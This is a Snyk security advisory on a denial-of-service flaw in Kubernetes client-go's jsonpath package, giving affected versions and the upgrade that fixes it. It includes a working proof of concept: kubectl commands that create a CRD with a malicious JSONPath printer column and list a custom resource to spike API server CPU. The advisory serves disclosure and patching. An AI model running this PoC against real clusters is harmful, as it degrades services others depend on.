Denial of Service (DoS) Affecting github.com/kubernetes/client-go/util/jsonpath package, versions <0.16.4 >=1.7.6 <1.16.0-beta.1 >=1.17.0-alpha.0 <1.17.0-alpha.1
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMKUBERNETESCLIENTGOUTILJSONPATH-7540855
- published 18 Jul 2024
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade github.com/kubernetes/client-go/util/jsonpath to version 0.16.4, 1.16.0-beta.1, 1.17.0-alpha.1 or higher.
Overview
github.com/kubernetes/client-go/util/jsonpath is a template engine using jsonpath syntax, which can be seen at http://goessner.net/articles/JsonPath/. In addition, it has {range} {end} function to iterate list and slice.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: foos.example.com
spec:
group: example.com
scope: Namespaced
names:
plural: foos
singular: foo
kind: Foo
version: v1
additionalPrinterColumns:
- name: FOO
type: string
JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
name: foo-cr
spec:
foo:
bar:
baz:
qux: data
EOF
kubectl get foo
The API server CPU usage significantly increases